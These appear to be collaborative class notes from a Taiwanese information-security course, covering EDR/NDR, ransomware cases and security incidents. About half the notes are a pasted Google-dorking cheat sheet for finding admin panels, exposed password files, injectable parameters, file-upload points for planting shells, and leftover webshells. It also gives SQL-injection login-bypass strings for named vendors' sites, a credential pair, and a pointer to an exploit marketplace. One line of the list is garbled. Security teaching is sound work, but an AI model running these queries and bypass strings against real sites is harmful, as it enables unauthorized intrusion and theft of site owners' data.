# 資訊安全概論與法規01 113年資安基礎技能-假日養成班
## 課程資訊
臺北市松山區復興 南路一段 390 號 2 樓(資展國際股份有限公司 A206 電腦教室)
* 資安安全概論及資安法規(7月20日,09:30-16:30)
* 資安風險盤點(7月21日,09:30-17:30)
* 網路流量威脅分析(7月27日,09:30-17:30)
* 駭客的網頁攻擊手法(7月28日,09:30-17:30)
* 從搜尋引擎探索資安的世界(8月3日,09:30-16:30)
* API應用程式介面安全(8月4日,09:30-17:30)
* 弱點掃描及滲透測試I(8月10日,09:30-17:30)
* 弱點掃描及滲透測試II(8月11日,09:30-17:30)
* 資安事件分析(8月17日,09:30-16:30)
https://ievents.iii.org.tw/EventS.aspx?t=0&id=2506
---
## 協作筆記
https://hackmd.io/@yilang/BJSQjOOuA
講師 蔡一郎
日期:2024年7月20日
時間:9:30~12:30 13:30~16:30
協作:https://tinyurl.com/20240720W
簡報:https://tinyurl.com/20240720P
平台:https://xrange.shieldx.io/
---
## 資安誰做?
* 公司裡通常都是資訊部門在做
* 資安要求是否會改變流程? 會 可能會帶來一些衝擊
* 以前只有電腦掃毒
* 現在可能包含網站遭入侵、勒索軟體、釣魚郵件、資料外洩、暗網外流檔案清除
---
## 2024年的infosec 增加資安產業大聯盟
[台灣資安大聯盟正式成立 致力打造台灣成為全球數位安全領導者](https://www.informationsecurity.com.tw/article/article_detail.aspx?aid=11132)
台灣八個資安公協會:台灣資訊安全協會、資訊應用服務聯盟、台灣資安產業發展協會、NDS次世代創新數位安全協會、台灣數位安全聯盟、國際資訊安全人才培育與推廣協會、臺灣校園資訊安全推廣暨駭客培育協會、台灣網際空間與安全政策發展協會,共同發起成立「台灣資安大聯盟」
InfoSec Taiwan 主席蔡一郎則強調:「資訊安全是跨界與跨域的綜合科學,只有透過跨組織的合作,透過 InfoSec Taiwan 國際資安社群平台,將資訊安全的意識深耕至各個應用領域。」
---
## 資安目前大概能處理4~5成的網路流量
為什麼只有這麼少? 因為很多流量加密,不見得全部都看得到
駭客手上的玩具很多,不會只用一招打你,甚至他也會知道企業所使用的環境
---
## 單元課程 課程大綱
### 資安安全概論
1. 資通安全防護概論
2. 常見的網路攻擊技術
3. 網路設備之功能及屬性
4. 網路架構安全部署作業原則
5. 網路架構安全管理程序
6. 資安事件案例分享
7. 資安治理與因應之道
8. 網路通訊協定與網路架構
### 資安法規與規範
1. 資通安全管理法及相關法規
2. 資安管理制度與安全標準
3. 實務案例分享
### 資安風險盤點
1. 資通安全管理法及相關法規
2. 網路架構檢視
3. 網路惡意活動檢視
4. 使用者端惡意程式檢視
5. 伺服器主機惡意活動檢視
6.安全設定檢視
### 網路流量威脅與分析
1. 網路傳輸基礎觀念
2. 網路通訊協定認識
3. 網路封包分析平台介紹
4. 常見封包格式拆解辨認
5. 封包分析工具操作
6. 封包分析實戰
### 駭客的網頁攻擊手法
1. 網頁攻擊手法介紹
2. OWASP Top 10 2021
3. 網頁檢測工具介紹與操作
4. 網頁弱點分析實戰(指令注入、XSS注入、SQL注入)
5. 網頁弱點分析實戰 (檔案存取漏洞、SQLMap、網站後
門程式)
### 從搜尋引擎探索資安的世界
1. Google Hacking介紹
2. Google Hacking搜尋語法教學
3. GHDB與Shodan功能介紹與實際操作
### API應用程式介面安全
1. API攻擊手法介紹
2. OWASP API Security Top 10
3. 檢測工具介紹與操作
4. API弱點分析實戰
### 弱點掃描、滲透測試
1. 系統及服務弱點探測
2. 弱點掃描報告解讀及工具介紹
3. 滲透測試手法及工具介紹
4. 滲透測試攻擊實戰
### 資安事件分析
1. 資安事件調查與案例介紹
2. 日誌分析技術與工具教學
3. 資安事件案例分析實務 - 異常日誌、網路攻擊、網頁攻
擊、惡意程式攻擊
---
## 公開決標結果,看到得標公司,對資安的影響?
這間公司代理的產品只有少數幾種,很容易被鎖定特定產品漏洞去攻擊
---
## 使用對話式ai不小心外洩資料 (samsung)
[員工外洩內部機密!三星開放ChatGPT後出事緊急限縮使用](https://www.ithome.com.tw/news/156291)
* 三星裝置解決方案及半導體業務部門發生三起事件,出自員工將公司機密資訊輸入ChatGPT而外流。外洩的資訊包括半導體設備量測資料庫、生產/瑕疵設備相關軟體,以及一份公司會議語音轉錄的文字紀錄摘要。
---
## 數位鑑識和資安調查事件分析的差別
* 鑑識:要產生證據,採集的證據要有證據力,呼應人事時地物的要求,證物鏈的保存
* 事件調查:稍微簡單一點
---
## 勒索軟體有沒有可能事前 事中處理? EDR NDR
* 事前:EDR (event) 硬碟讀取可能是異常行為
* 事中:NDR (network) 一群電腦都要去某個地方 同時發生
## 一堆老師的電腦短時間都對某台主機發出訊號,怎麼回事?
一查發現是老師用的opensource 免費螢幕錄影 ocam ,下午各學校一起更新,同時連到更新伺服器。
## oCam挖礦程式事件
* ocam 雖然免費,但授權有提到希望允許使用者電腦閒置時提供**資源**
* 2018年上半年,北區ASOC中心接獲使用者反映oCam螢幕錄影程式內含挖礦程式,經同仁測試Ohsoft旗下的軟體有類似情況。
* oCam安裝程式在授權合約步驟塞了一個同意贊助及安裝挖礦程式的選項(如圖三所示),安裝挖礦程式選項預設打勾,使用者也可以取消預設值安裝程式。
* 只要使用者沒有注意到這個預設選項,挖礦程式隨著oCam主程式一起安裝了。
https://www.uso.com.tw/portal_b1_page.php?owner_num=b1_55912&button_num=b1&cnt_id=7567

---
## Endpoint Detection and Response 端點偵測回應
連接到網路的每台設備都代表來自 Internet 的威脅的潛在攻擊媒介,並且這些連接中的每一個都是通往您的資料的潛在Gateway;一般而言,EDR 解決方案從端點收集資料,使用它來識別潛在威脅,並提供有用的方法來調查和回應這些潛在威脅——現代解決方案甚至可以自動產出後續報告。
範圍:端點和主機
* 意圖:端點/接入區域保護免受滲透、監控和緩解、漏洞評估、警報和回應
* 方法:惡意行為、攻擊指標 (IoA)、妥協指標 (IoC)、簽名(signatures)、機器學習(ML)
參考來源
* 2021年度重大資安事件回顧 身分冒用,供應鏈與漏洞攻擊
https://s.itho.me/ccms_slides/2022/10/7/2ccbbf74-c3e2-463a-98e6-693b86ccd13e.pdf
---
## Network Detection and Response 【網路偵測回應】
這是從傳統的網路安全演變而來的,是 NTA(網路流量分析)的一個子領域,它可以全面了解網路的已知和未知威脅;為提供集中的、基於機器的網路流量分析和回應的解決方案,透過包括高效的工作流程和自動化、網路中的定位和機器學
習(ML)的幫助,洞察和分析所有的網路,來識別和消除特別是橫向移動。
---
## 資料有備份,被lockbut勒索軟體攻擊還原都簡單,但你會想找來源嗎?
* 一堆電腦都有倒數計時,看時間最少的就是那台為發起點了
* 接著就是蒐集跟這台電腦對外有關的操作行為
* 勒索軟體比較不會有潛伏,駭客想早點拿到錢
* 單純調查這一台電腦沒什麼用,因為硬碟被加密了看不出東西,所以看電腦有無操作其他系統比較能找到資訊
---
## 台積電供應商遭LockBit勒索7千萬美金,新版勒索即服務新增加價延長功能
LockBit是目前最活躍的勒索即服務(RaaS)供應商,此次是LockBit 3.0新版攻擊手法,新增受駭者可加價 **支付5千美金** 延長24小時的資料揭露時間
https://www.ithome.com.tw/news/157611
---
## 駭客攻擊路徑舉例
1. 駭客把勒索軟體上傳到列印事務機上的小小儲存區 (公開網路 or 事務機有開連線外部伺服器)
2. 寄假求職信到公司去 (偽裝成應徵部門主管)
3. 履歷表是pdf,打開時就觸發去開啟內網事務機上的惡意程式
:::info
想想
防毒軟體去做惡意程式特徵比對,但只比對到pdf和內網路徑,防毒軟體查得嗎?
:::
---
## linux 和 windows 的超級管理者
* linux:指令列要輸入 sudo (super user do) ,可能需要打密碼
* windows:會跳UAC視窗要按確定

---
## 一天有多少惡意程式誕生?
* 研究員在國立大學放一堆偵測程式統計惡意程式
* 2020年,在台灣一天可以抓到 8,000 ~ 12,000 個全新的惡意程式
* 研究員跟 The Shadowserver Foundation 合作,台灣發現的惡意程式大概有 15% 是專門為了台灣而寫的,其他國家沒看過
* The Shadowserver Foundation一天大概可以抓100萬個惡意程式
* 加殼後的程式,就被新程式了
---
## EDR 檢查的一些權重問題
* windows 裡的 svchost.exe 這個程式做什麼?
負責 user shell和網路通訊,讓開發人員不用處理這麼細
* 為什麼要有 127.0.0.1?
方便系統呼叫時,可以統一走網路呼叫
* EDR可以對兩類行為給予不同嚴重性
---
## 立法院附近的教學醫院問 有100萬筆以上的情資能不能塞在一台超大伺服器?
* 台灣資安處理的時間要求,最慢72小時處理
* 如果某個中繼站無法在72小時內處理,那就沒意義了
* 把72小時以上的情資都丟了之後,剩下的只有3萬筆
---
## 2017年台灣學校印表機被勒索事件
[臺灣多間學校收到駭客勒索詐騙信,透過印表機擅自印出帶有威脅內容的文字,其實這已經拉起了IoT攻擊的警報,同時也暴露出更多連網設備管理的安全隱憂](https://www.ithome.com.tw/news/114128)
在2月17日至3月14日這段期間,共有72個單位170個印表機回報有收到這樣的恐嚇訊息

---
## 列印管道有什麼? chrome 可以雲端列印
[Google在2013年7月更新了雲端列印(Cloud Print)的多項功能](https://meet.bnext.com.tw/articles/view/28671),推出可以直接支援Windows作業系統的驅動程式與列印服務,讓使用者可不必透過瀏覽器Chrome,就能直接執行列印工作。
使用者只要**提供連結,就能讓他人共享印表機**,還可以設定每日列印的張數限制。

---
## 電腦被入侵,反而很好用(?)
老闆的電腦中毒,資料會被竊取
結果老闆說這台電腦很好用
因為老闆知道後,故意在裡面放假報價資料,讓競爭對手猜不出來實際報價
---
## etag上線第一天 元旦1月1號上線
* 12/31是人工收費
* 1/1當天是假日,車流量超大,460萬台車在高速公路上跑
* 當時還有做app,可以幫忙查過路費用或是免費里程量
* 主管:當日app連不上,是駭客攻擊
* 設計缺點:server ip 寫死在app上
* app設計是註冊失敗時每1秒鐘都會連回 server
> 政務委員張善政:「他的APP設計的確是有些邏輯上的缺失,試圖再回去連線的頻率非常高,所以就造成網站有大量連線需求進來,造成網站負荷 超過它原先設計。」
---
## etag 實際事件新聞紀錄
* 大當機、駭客攻擊 eTag系統安全連環爆,計程收費App遇82億次DDos攻擊大當機 主機管理資訊也遭竊外洩。 文/王宏仁 | 2014-01-10發表
https://www.ithome.com.tw/news/84728
* eTag遭DDoS攻擊驚爆作假,82億次攻擊傳灌水
遠東電收也於傍晚承認,一開始誤以為遭駭而報警,但調查過程中還原資料發現並非大量網路攻擊。 文/黃彥棻 | 2014-01-15發表
https://www.ithome.com.tw/news/84781
* 如果註冊失敗,設定每1秒都會重新嘗試連線,持續連線到註冊成功為止
原文網址: eTag系統非遭駭 政府報告:app有漏洞 | 生活 | Newtalk新聞 https://newtalk.tw/news/view/2014-01-15/43679
---
## dns checker 檢查全世界來看網站時看到的ip
https://dnschecker.org/
* iii.org 只有一組

* hinet.net 有多組 (可能有cdn)

---
## Tesla程式在2021/11/20 發生全球性服務異常,造成以手機當作汽車鑰匙的某些Model 3車主,無法開解鎖車輛
* 中國的特斯拉APP在5月13日晚上發生了大規模當機的情況,因此導致車主的手機無法與車子進行連結,手機鑰匙也失效。因此甚至連車門都打不開,沒辦法上車。就算可以進入車內,也沒辦法讓打開儀表板、中控螢幕,只能「盲開」
* 全球有部份特斯拉(Tesla)Model 3車主發現手機上的Tesla程式出現「500伺服器錯誤」的資訊,造成車主無法以程式來操縱汽車,包括鎖車、車子解鎖或是充電等,且大概持續了數個小時,
* https://www.techbang.com/posts/78550
---
## 找被入侵的網站 "hacked by" site: .tw
* https://6822322.ho.net.tw/news.php?n_ID=1
* 
## 渗透测试之信息收集(下篇) google hacking
https://blog.csdn.net/weixin_40324676/article/details/102954141
```
三、日常应用
1、查找管理后台
site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms
2、查找文件
filetype:doc
filetype:.doc site:.mil classified //直接搜索军方相关word
filetype:xml
filetype:rar
filetype:docx
filetype:inc
filetype:mdb
filetype:txt
filetype:emali
filetype:xls
filetype:.sql
filetype:inc
filetype:conf
filetype:txt
filetye:xml
filetyep:pdf
学生信息 fitepy:xls
3.查看网站支持的脚本
filetype:asp
filetype:jsp
filetyp:php
filetype:ASPX
4、目录遍历及敏感信息泄露
intitle:“index of” etc
intitle:“Index of” .sh_history
intitle:“Index of” .bash_history
intitle:“index of” passwd
intitle:“index of” people.lst
intitle:“index of” pwd.db
intitle:“index of” etc/shadow
intitle:“index of” spwd
intitle:“index of” master.passwd
intitle:“index of” htpasswd
intitle:“index of” admin
inurl:service.pwd
intitle:phpmyadmin intext:Create new database //搜索phpmyadmin直接进入后台
intitle:“php shell*” “Enable stderr” filetype:php//批量搜索webshell
intitle:“index of” data //列出data目录
intilte:“error occurred” ODBC request where (select|insert) //搜索sql注入出错页面
intitle:index.of filetype:log //搜索日志文件
5、intitle查找管理后台
intitle:管理
intitle:登录
intitle:后台
intitel:“后台登录”
6、查找警告错误信息
intile:error
intitle:warning
7、inurl中的管理后台路径
nurl:admin/manager
admin
admin_index
admin_admin
index_admin
admin/index
admin/default
admin/manage
admin/login
manage_index
index_manage
manager/login
manager/login.asp
manager/admin.asp
login/admin/admin.asp
houtai/admin.asp
guanli/admin.asp
denglu/admin.asp
admin_login/admin.asp
admin_login/login.asp
admin/manage/admin.asp
admin/manage/login.asp
admin/default/admin.asp
admin/default/login.asp
member/admin.asp
member/login.asp
administrator/admin.asp
administrator/login.asp
8、inurl中的数据库和配置文件
inurl:editor/db/
inurl:eWebEditor/db/
inurl:bbs/data/
inurl:databackup/
inurl:blog/data/
inurl:okedata
inurl:bbs/database/
inurl:conn.asp
inurl:inc/conn.asp
inurl:“viewerframe?mode=”//搜索摄像头地址
inurl:db
inurl:mdb
inurl:config.txt
inurl:bash_history
inurl:data filetype:mdb //搜索mdb格式数据库
9、inurl中的搜索备份文件
inurl:temp
inurl:tmp
inurl:backup
inurl:bak
10、inurl中查找注入点
site:xx.com filetype:asp
site:tw inurl:asp?id= //这个是找台湾的
site:jp inurl:php?id= // 这个是找日本的
site:ko inurl:jsp?id= // 这个是找韩国的
11、inurl之上传漏洞
site:xx.com inurl:file
site:xx.com inurl:load
12、目标遍历漏洞
Index of /admin
Index of /passwd
Index of /password
Index of /mail
“Index of /” +passwd
“Index of /” +password.txt
“Index of /” +.htaccess
“Index of /secret”
“Index of /confidential”
“Index of /root”
“Index of /cgi-bin”
“Index of /credit-card”
“Index of /logs”
“Index of /config”
“indexof/”inurl:lib //搜索图书馆一般目录遍历下载
13、突破下载文件和任意文件下载
"indexof/"ppt
"indexof/"mp3
"indexof/"word
"indexof/"xls
"indexof/"swf 等
14、实例googel语法入侵
1.site: scu.edu.cn//得出该主域名下的所有其他子域名或者页面信息如:http://a1.xxxx.com http://a2.xxxx.com http://a3.xxxx.com http://a4.xxxx.com 2.找各个子域名的管理后台:
site: a1.xxxx.com intitle:管理 或者后台 或者登陆等关键字
site:a1.xxxx.com inurl:login 或者inurl:admin 可以跟常用的后台路径
site:a1.xxxx.com intext:管理 或者后台 或者登陆等关键字
这里我们得到2个后台管理地址:
http://a2.xxxx.com/sys/admin_login.asp
http://a3.xxxx.com:88/_admin/login_in.asp
3.查看各个子域名网站服务器跑的脚步对应的程序:site:a1.xxxx.com filetype:jsp site:a1.xxxx.com filetype:aspx site:a1.xxxx.com filetype:php site:al.xxxx.com filetype:asp 从上面我们看到该子域名上跑有一个php的后台和一个asp的留言系统 4.查找上传路径地址:
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
site:a4.xxx.com inurl:file
5.查找铭感信息`
site: scu.edu.cn intext:*@ scu.edu.cn 查找所有的邮箱地址
site:xxxx.com intext:电话查找所有电话
site:xxxx.com intext:身份证 查找所有身份证
------------------------------
配置文件泄露:site:lyshark.com ext:xml | ext:conf | ext:inf | ext:cfg | ext:txt | extra | ext:ini
目录遍历语法: site:lyshark.com intitle:index.of
数据库文件泄露:site:lyshark.com ext:sql | ext:dbf | ext:mdb
查找后台地址:site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms
查找文本内容:site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username
查找可注入点:site:域名 inurl:aspx|jsp|php|asp
查找上传漏洞:site:域名 inurl:file|load|editor|Files
找eweb编辑器:site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit
存在的数据库:site:域名 filetype:mdb|asp|#
查看脚本类型:site:域名 filetype:asp/aspx/php/jsp
迂回策略入侵:inurl:cms/data/templates/images/index/
利用谷歌语法搜索各种漏洞
tomcat
如果使用暴力破解成功突破tomcat的basic认证,上传恶意war包,可以很轻易的getshell
#site用于限制查询范围,intitle和intext用于匹配tomcat关键字
intitle:apache tomcat site:domain
intext:C A T A L I N A H O M E / w e b a p p s / R O O T / i n t i t l e : a p a c h e t o m c a t s i t e : d o m a i n i n t e x t : CATALINA_HOME/webapps/ROOT/ intitle:apache tomcat site:domain intext:CATALINA
H
OME/webapps/ROOT/intitle:apachetomcatsite:domainintext:CATALINA_HOME/webapps/ROOT/ inurl:8080/ site:domain
weblogic
weblogic框架曾爆出不少漏洞,如果存在该框架,是一个突破口
#site用于限制查询范围,inurl和intitle用于匹配weblogic的关键字
inurl:/console/login/LoginForm.jsp site:domain
inurl:/console/login/LoginForm.jsp intitle:Oracle WebLogic Server site:domain
inurl:/console/login/ intitle:“Oracle WebLogic Server 管理控制台” site:domain
jboss
jboss框架曾爆出不少漏洞,如果存在该框架,是一个突破口
#site用于限制查询范围,inurl用于匹配jboss的关键字
inurl:/jmx-console/htmladaptor site:domain
websphere
websphere框架曾爆出不少漏洞,如果存在该框架,是一个突破口
#site用于限制查询范围,inurl用于匹配websphere的关键字
inurl:/ibm/console/logon.jsp site:domain
phpmyadmin
phpmyadmin是MySQL的管理平台,并且可被爆破,一旦爆破成功,即可获取MySQL的权限,进而提权getshell
#site用于限定范围,inurl和intext用于匹配phpMyAdmin的关键字
inurl:/phpMyAdmin site:domain
inurl:/phpMyAdmin/index.php site:domain
inurl:/phpMyAdmin/index.php site:domain db+information_schema
inurl:/phpMyAdmin/index.php intext:phpMyAdmin site:domain
webmin
webmin是一个web版的linux系统管理工具,默认情况下工作在web的10000端口上
#site用于限制查询范围 intitle和intext用于匹配webmin的关键字
intitle:Login to Webmin intext:“login to the Webmin server on” site:domain
wordpress
wordpress是PHP的开源博客平台,其框架存在大量漏洞,尤其其框架存在很多SQL注入,通过SQL注入getshell
#site用于限制查询范围,inurl和index of用于匹配wordpress的关键字
inurl:/wp-login.php site:domain
index of /wp-content/uploads inurl:/wp-login.php site:domain
inurl:/wp-content/themes/theagency site:domain
joomla
joomla框架曾爆出不少漏洞,如果存在该框架,是一个突破口
#site用于限制查询范围,inurl用于匹配joomla的关键字
inurl:/administrator/index.php site:domain
inurl:index.php?option=com_advertisementboard site:domain 找注入
inurl:index.php?option=com_carocci site:domain
inurl:index.php?option=com_product site:domain
inurl:/administrator/index.php site:domain
drupal
drupal框架曾爆出不少漏洞,如果存在该框架,是一个突破口
#site用于限制查询范围,inurl和intext用于匹配drupal的关键字
inurl:CHANGELOG.txt intext:drupal intext:“SA-CORE” -site:github.com -site:domain
特征查找
个人觉得这个不错
#在使用时最好加上site限制查询范围,且版本号也可忽略
power by wordpress powered by discuz x3.2
powered by phpcms 2008 powered by drupal 7
powered by dedecmsv57_gbk powered by CubeCart 3.0.6
Powered by phpBB 2.0.6 powered by paBugs 2.0 Beta 3
inurl:wp-login.php inurl:/administrator/index.php
inurl:/admina.php
owa
outlook邮箱
inurl:/owa/auth/logon.aspx site:domain
vpn
inurl:/sslvpn site:domain
mirapoint
自行添加site以限制查询范围
inurl:/cgi-bin/search.cgi site:domain
inurl:/cgi-bin/madmin.cgi site:domain
zimbra
自行添加site以限制查询范围
inurl:7071/zimbraAdmin/ site:domain
inurl:/help/en_US/standard/version.htm site:domain
常见的后台地址
有用 !! 自行添加site以限制查询范围
inurl:/manager/login.php site:domain
inurl:/cms/login.php site:domain
inurl:/manage/index.php site:domain
inurl:/system/login.php site:domain
inurl:/webadmin/login.php site:domain
inurl:admin_login.php intitle:admin login site:domain
inurl:admin_login.php intitle:admin page site:domain
inurl:/admin/login.php site:domain
inurl:/admin/index.php site:domain
inurl:/system/adminlogin.asp site:domain
inurl:/manage/login.aspx site:domain
inurl:/sysadm/index.php site:domain
intext:“Website Design & Developed By : WebSay” 默认后台/admin
intext:“Powered by ENS Consultants” 默认后台/admin/login.php
intext:“Desenvolvimento - MW Way” 默认后台/admin/index.php
inurl:.php?id= intext:“Web realizada por Soma Estudio”
inurl:/_mycps/login.php
intext:“design by weli” 默认后台: /adm/login.php 除了弱口令还有注入(linjizen@gmail.com/lin719192)
inurl:categorysearch.php?indus= site:domain SQL注入
svn
自行添加site以限制查询范围
inurl:/.svn/entries site:domain
上传点
自行添加site以限制查询范围
intext:" Powered by JADBM " JADBM Cms upload shell 注册后登陆上传即可
inurl:"/index.php/frontend/login/en" Estate cms upload shell 注册后登陆上传即可
inurl:/Content/Roxy_Fileman/ 该路径下直接就是上传点
index of:“filemanager/dialog.php” 该脚本就是上传脚本直接上传即可
intext:“Desenvolvido por Webnet Soluções Tecnológicas.” fck上传
inurl:“subir_foto.php” 上传点
inrul:"/imce?dir=" intitle:“File Browser”
inurl:“Powered by Vision Helpdesk 3.9.10 Stable” 注册后登陆进去编辑个人配置上传
index of /admin/fckeditor site:.tw
inurl:/ewebeditor/ site:.tw
inurl:/admin/upload_file.php
inurl:/admin/upfile.php
inurl:/admin/upload.asp
文件包含和命令执行
自行添加site以限制查询范围
inurl:footer.inc.php?settings=
inurl:/pb_inc/admincenter/index.php?page=
inurl:/pnadmin/categories.inc.php?subpage=
inurl:/index.php??view=src/sistema/vistas/
inurl:/edit.php?em=file&filename=
inurl:/path_to_athena/athena.php?athena_dir= 远程包含
inurl:/path_to_qnews/q-news.php?id= 远程包含
inurl:/inc/backend_settings.php?cmd=
inurl:login.action strus2系列执行漏洞利用
inurl:php?x= inurl:php?open=
inurl:php?visualizar= inurl:php?pagina=
inurl:php?inc= inurl:php?include_file=
inurl:php?page= inurl:php?pg=
inurl:php?show= inurl:php?cat=
inurl:php?file= inurl:php?path_local=
inurl:php?filnavn= inurl:php?HCL_path=
inurl:php?doc= inurl:php?appdir=
inurl:php?phpbb_root_dir= inurl:php?phpc_root_path=
inurl:php?path_pre= inurl:php?nic=
inurl:php?sec= inurl:php?content=
inurl:php?link= inurl:php?filename=
inurl:php?dir= inurl:php?document=
inurl:index.php?view= inurl:.php?locate=
inurl:.php?place= inurl:.php?layout=
inurl:.php?go= inurl:.php?catch=
inurl:.php?mode= inurl:.php?name=
inurl:.php?loc= inurl:.php?f=
inurl:.php?inf= inurl:.php?pg=
inurl:.php?load= inurl:.php?naam=
allinurl:php?page= allinurl:php?file=
inurl:php?x= inurl:admin.php?cal_dir=
inurl:php?include= inurl:php?nav=
inurl:.php?sel= inurl:php?p=
inurl:php?conf= inurl:php?prefix=
inurl:theme.php?THEME_DIR=
inurl:php?lvc_include_dir=
inurl:php?basepath= inurl:php?pm_path=
inurl:php?user_inc= inurl:php?cutepath=
inurl:php?fil_config= inurl:php?libpach=
inurl:php?pivot_path= inurl:php?rep=
inurl:php?conteudo= inurl:php?root=
inurl:php?configFile inurl:php?pageurl
inurl:php?inter_url inurl:php?url=
inurl:php?cmd= inurl:path.php?my=
inurl:php?xlink= inurl:php?to=
inurl:file.php?disp=
商城类
自行添加site以限制查询范围
inurl:".php?catid=" intext:“View cart”
inurl:".php?catid=" intext:“Buy Now”
inurl:".php?catid=" intext:“add to cart”
inurl:".php?catid=" intext:“shopping”
inurl:".php?catid=" intext:“boutique”
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:“Toys”
inurl:details.php?BookID=
inurl:shop.php?do=part&id=
CMS
自行添加site以限制查询范围
inurl:article.php?ID= inurl:newsDetail.php?id=
inurl:show.php?id= inurl:newsone.php?id=
inurl:news.php?id= inurl:event.php?id=
inurl:preview.php?id= inurl:pages.php?id=
inurl:main.php?id= inurl:prod_detail.php?id=
inurl:view.php?id= inurl:product.php?id=
inurl:contact.php?Id= inurl:display_item.php?id=
inurl:item.php?id= inurl:view_items.php?id=
inurl:details.asp?id= inurl:profile.asp?id=
inurl:content.asp?id= inurl:display_item.asp?id=
inurl:view_detail.asp?ID= inurl:section.php?id=
inurl:theme.php?id= inurl:produit.php?id=
inurl:chappies.php?id= inurl:readnews.php?id=
inurl:rub.php?idr= inurl:pop.php?id=
inurl:person.php?id= inurl:read.php?id=
inurl:reagir.php?num= inurl:staff_id=
inurl:gallery.php?id= inurl:humor.php?id=
inurl:spr.php?id= inurl:gery.php?id=
inurl:profile_view.php?id=
inurl:fellows.php?id= inurl:ray.php?id=
inurl:productinfo.php?id=
inurl:file.php?cont= inurl:include.php?chapter=
inurl:principal.php?param=
inurl:general.php?menue= inurl:php?pref=
inurl:nota.php?chapter= inurl:php?str=
inurl:php?corpo= inurl:press.php?[]*=
inurl:asp?pid= inurl:php?id=
inurl:aspx?id= inurl:jsp?id=
inurl:do?id= inurl:cgi?id=
万能密码
自行添加site以限制查询范围
inurl:“wladmin/login.asp”
Username : ‘=’ ‘or’
Password : ‘=’ ‘or’
intext:POWERED BY Versatile Software Services 默认后台/alogin.aspx
User ==> ‘or’’=’
Pass ==> ‘or’’=’
inurl:/media.php?hal=login
Email: ‘=’‘or’@gmail.com
Pass: ‘=’‘or’
intext:“Powered by : Best Webmasterz.” 默认后台/admin
User : ‘=’ ‘OR’
Pass : ‘=’ ‘OR’
intext:“Web Design and Maintenance by Cloud 5 Solutions” 默认后台/admin/login.php
User : ‘=’ ‘OR’
Pass : ‘=’ ‘OR’
intext:“网站设计:火龙科技” 默认后台/maintain/login.php
Username : ‘=’ ‘or’
Password : ‘=’ ‘or’
intext:“Powered by Moodyworld” 默认后台/admin/
Username : ‘=’ ‘or’
Password : ‘=’ ‘or’
敏感信息泄露
自行添加site以限制查询范围
site:domain inurl:/phpinfo.php
filetype:log “PHP Parse error”| “PHP Warning”
site:domain “id=” & intext:"Warning: mysql_fetch_array()
site:domain “id=” & intext:"Warning: getimagesize()
site:domain “id=” & intext:"Warning: array_merge()
site:domain “id=” & intext:"Warning: mysql_fetch_assoc()
site:domain “id=” & intext:"Warning: mysql_result()
site:domain “id=” & intext:"Warning: pg_exec()
site:domain “id=” & intext:"Warning: require()
inurl:/robots.txt site:.
inurl:/application/configs/ 配置文件名为/application/configs/application.ini
----------------------------htpasswd--------------------------------
htpasswd.bak filetype:htpasswd
-----------------------------cisco vpn----------------------------
filetype:pcf “GroupPwd”
cisco在线密码解密网站==>https://www.unix-ag.uni-kl.de/~massar/bin/cisco-decode
-----------------ftp 账号密码-----------------------------
“index of/” “ws_ftp.ini” “parent directory”
“your password is” filetype:log
filetype:ini inurl:“serv-u.ini”
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
ext:inc “pwd=” “UID=”
auth_user_file.txt
filetype:sql inurl:backup inurl:wp-content
inurl:/eWebEditor/db/ site:domain
filetype:xls QQ site:cn
目录遍历
site:domain index of /admin
site:domain index of /upfiles
site:domain index of /fckeditor/editor/
site:domain index of /admin/uploadfile
site:domain index of /admin/file
site:domain index of /system/file
site:domain index of /phpmyadmin
site:domain index of /web/backup/
inurl:/phpmyadmin/index.php site:domain
遗留webshell
自行添加site以限制查询范围
inurl:b374k.php filetype:php
inurl:c99.php
inurl:c100.php Generation time:
inurl:itsecteam_shell.php
intext:x2300 Locus7Shell v. 1.0a beta Modded by
intext:c99shell inurl:c99.php
powered by Captain Crunch Security Team
“inurl:c99.php” + “intext:safe”
intitle:r57shell
intitle:c99shell +uname
inurl:c99.php uid=0(root)
intitle:c99shell+filetype:php
intitle:ly0kha shell
inurl:.php “cURL: ON MySQL: ON MSSQL: OFF”
“Shell” filetypehp intext:“uname -a:” “EDT 2010”
intitle:“intitle:r57shell”
inurl:“c99.php” & intext:Encoder Tools Proc.
inurl:“c100.php” & intext:Encoder Tools Proc.
intitle:“Shell” inurl:".php" & intext:Encoder Tools Proc.
```
---
## 選課系統登入失敗的問題
* 帳號密碼連續錯誤3次,會鎖15分鐘不能登入
* 學生為了自己選課方便,故意用同學學號登入失敗,自己比較容易選到課
---
## 老鼠和瓦楞紙迷宮
https://www.linkedin.com/posts/sanjayanandhammer_determination-keepgoing-progressnotperfection-activity-6715886541035577344--ozF
---
## Google Maps Hacks by Simon Weckert
* https://www.youtube.com/watch?v=k5eL_al_m7Q
* 拖著一堆手機 google地圖交通就變紅了
[](https://www.youtube.com/watch?v=k5eL_al_m7Q)
---
## 行動應用資安聯盟 身分鑑別定義?
* 行動應用App基本資安檢測基準V3.2
* 「L1」行動應用程式:無須使用者身分鑑別之應用程式。
* 「L2」行動應用程式:須使用者身分鑑別之應用程式。
* 「L3」行動應用程式:含有交易行為之應用程式。
* 我不用登入就是無須使用者身分鑑別? 抓 裝置id 算不算身分鑑別?
* https://www.mas.org.tw/download/app
---
## 買漏洞的網站 0day.today
* https://0day.today/
* 有付費也有免費
* 用 tor 洋蔥瀏覽器看會更便宜一點
* 
---
## TAnet學術網路架構圖
* https://traffic.tanet.edu.tw/
* 套件來源 http://www.network-weathermap.com/manual/pages/main.html#example
* 
---
## 視覺化 httprequest log
* apache可直接用 iis要轉
* https://logstalgia.io/
* https://www.youtube.com/watch?v=HeWfkPeDQbY
* 